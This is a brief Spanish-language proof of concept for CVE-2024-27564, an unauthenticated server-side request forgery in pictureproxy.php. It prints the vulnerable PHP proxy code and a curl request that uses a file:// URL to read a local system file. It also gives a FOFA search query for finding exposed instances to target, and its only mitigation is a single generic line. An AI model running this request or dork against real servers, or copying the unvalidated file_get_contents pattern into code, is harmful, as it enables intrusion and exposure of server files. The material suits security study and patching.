
Prueba de concepto para CVE-2024-27564, un SSRF no autenticado en pictureproxy.php a través del parámetro url, con código vulnerable, PoC en curl y notas de mitigación.
Una vulnerabilidad en pictureproxy.php permite a atacantes remotos realizar peticiones arbitrarias inyectando URLs en el parámetro url. Esta vulnerabilidad SSRF puede explotarse sin autenticación, lo que la hace particularmente peligrosa.
El código vulnerable está en el archivo pictureproxy.php. El problema ocurre porque la función no valida correctamente el parámetro url. La variable $_GET['url'] se pasa a la función file_get_contents(), que obtiene contenido de la URL especificada. Esto puede dar lugar a SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Curl Request:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
Se necesita una gestión adecuada de la validación de entrada.